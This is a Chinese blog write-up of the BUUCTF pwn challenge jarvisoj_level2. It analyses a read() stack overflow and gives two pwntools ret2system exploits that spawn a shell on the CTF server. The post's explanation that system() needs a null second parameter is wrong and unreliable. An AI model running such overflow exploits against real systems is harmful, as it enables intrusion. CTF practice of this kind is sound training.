buuctf pwn08

已于 2023-10-24 23:34:14 修改
阅读量40 收藏
点赞数
文章标签: 1024程序员节
于 2023-10-24 23:01:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134023353
版权

jarvisoj_level2 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
点进去vulnerable_function()找到溢出点read函数
buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop
在这里插入图片描述
函数自身直接调用了system函数, 我们试着找下bin/sh
shift+f12, 果然有bin/sh,找到具体地址: binsh_addr = 0804A024
在这里插入图片描述
在该函数里反汇编找到调用system函数的指令的地址
在这里插入图片描述
故可构造如下exp:
exp1:

from pwn import*
r=remote('node4.buuoj.cn',25612) 
str_bin_sh=0x804a024
payload=b'a'*(0x88+4)+p32(0x804845C)+p32(str_bin_sh)
r.sendlineafter(b'\n',payload)
r.interactive()

exp2:

from pwn import *
io = remote("node4.buuoj.cn",25612)
elf = ELF("./pwn08")
system_addr = elf.symbols["system"]
bin_sh_addr = 0x0804a024
payload = b"a"*(0x88+0x04) + p32(system_addr) + p32(0) + p32(bin_sh_addr)
io.sendlineafter("Input:\n",payload)
io.interactive()

在这段代码中,我们使用了system函数来执行/bin/sh命令,因此需要将/bin/sh字符串的地址作为system函数的参数。为了满足system函数的调用要求,我们在payload中添加了一个空值作为第二个参数。

总结一下,system函数调用的要求是:

第一个参数是一个指向以空字符结尾的字符串的指针,表示要执行的命令或程序的路径。
第二个参数是一个空值,表示没有其他参数传递给被执行的命令或程序。

cat flag
在这里插入图片描述

曾经满眼皆是她
关注
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2576
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2084
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
jarvisoj-level2
qq_35661990的博客
11-09 1383
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj level1-2
sun的博客
10-03 635
level1 先使用checksec查询一下这个保护机制没有开启任何保护 [*] '/home/sun/Desktop/1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 444
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 611
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
jarvisoj_level21解题
最新发布
2301_81504456的博客
02-04 460
没有调用先前指令system函数的情况下,在执行完函数后需要一个数据作为system的返回地址。
BUUCTF pwn rip
weixin_55190422的博客
11-03 340
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF pwn前四题解答和培训内容整理笔记
lzglove666的博客
01-31 1513
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 728
jarvisoj_level2【BUUCTF
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3641
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
[CTF]jarvisoj_level2
凉水的博客
01-12 511
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
BUUCTF Pwn jarvisoj_level21解题步骤
2301_81505831的博客
02-04 232
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
[BUUCTF-pwn]——jarvisoj_level302-21
Y_peak的博客
02-21 209
[BUUCTF-pwn]——jarvisoj_level3 题目地址: https://buuoj.cn/challenges#jarvisoj_level3 以前好像写过这个题, 就不详细写了。有兴趣的可以去之前的博客翻一下, 就在BUU和OJ 里面 大致思路, 泄露出一个地址, 找到对应的libc版本。计算偏移找到system和’/bin/sh’ exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj
jarvisoj_level2题解
OrientalGlass的博客
01-08 246
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 497
[buuctf]jarvisoj_level2
jarvisoj_level2
weixin_56301399的博客
07-22 567
要先看函数结构,在去看栈结构,system和/bin/sh的位置很重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值